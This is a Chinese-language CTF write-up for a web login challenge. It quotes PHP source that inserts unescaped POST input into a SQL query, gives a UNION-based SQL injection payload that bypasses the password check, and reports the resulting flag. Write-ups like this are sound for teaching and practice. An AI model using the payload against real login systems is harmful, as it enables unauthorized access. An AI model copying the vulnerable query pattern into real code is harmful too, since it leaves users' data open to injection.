题目链接:http://ctf5.shiyanbar.com/web/5/index.php
- 查看源代码
找到index.txt - php审计
<?php
if($_POST[user] && $_POST[pass]) {
$conn = mysql_connect("********, "*****", "********");
mysql_select_db("phpformysql") or die("Could not select database");
if ($conn->connect_error) {
die("Connection failed: " . mysql_error($conn));
}
$user = $_POST[user];
$pass = md5($_POST[pass]);
$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
printf("Error: %s\n", mysql_error($conn));
exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
echo "<p>Logged in! Key:************** </p>";
}
else {
echo("<p>Log in failure!</p>");
}
}
mysql_fetch_array() 函数从结果集中取得一行作为关联数组,或数字数组,或二者兼有返回根据从结果集取得的行生成的数组,如果没有更多行则返回 false
MYSQL_ASSOC常量
strcasecmp(string1,string2)如果string1=string2则返回值为0
想要正确输出结果就要让:md5(pass) 与 row[pw] 相同 即 md5(pass) = $sql
- sql注入
$sql = "select pw from php where user='$user'";存在post注入
构造语句 "select pw from php where user='username' union select md5(1)#" “#”注释后面无用语句
- 登入
user=username’ union select md5(1)#
pass=1
得到flag:SimCTF{youhaocongming}